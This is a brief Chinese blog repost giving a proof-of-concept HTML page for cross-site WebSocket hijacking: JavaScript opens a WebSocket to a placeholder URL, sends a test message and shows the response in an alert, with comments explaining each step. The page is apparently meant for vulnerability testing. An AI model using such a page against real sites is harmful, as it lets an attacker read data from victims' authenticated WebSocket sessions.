其他分享
首页 > 其他分享> > websock跨域劫持

websock跨域劫持

作者:互联网

websock跨域劫持

poc:

<meta charset="utf-8">

<script>

function ws_attack(){//自定义函数ws_attack

//定义函数功能

//创建WebSocket并赋值给ws变量

var ws = new WebSocket("url");//如果请求的Websocket服务仅支持HTTP就写成ws://,如果请求的Websocket服务支持HTTPs就写成wss://

ws.onopen = function(evt) {

//当ws(WebSocket)处于连接状态时执行

ws.send("test websocket"); };

ws.onmessage = function(evt)

{ //当ws(WebSocket)请求有响应信息时执行

alert(evt.data)

//注意:响应的信息可以通过evt.data获取!例如:alert(evt.data);

ws.close();

   }; }

ws_attack();

//执行ws_attact函数

</script>

 

标签:function,劫持,WebSocket,跨域,data,attack,ws,websock,evt
来源: https://www.cnblogs.com/akihi-lu1l/p/13236968.html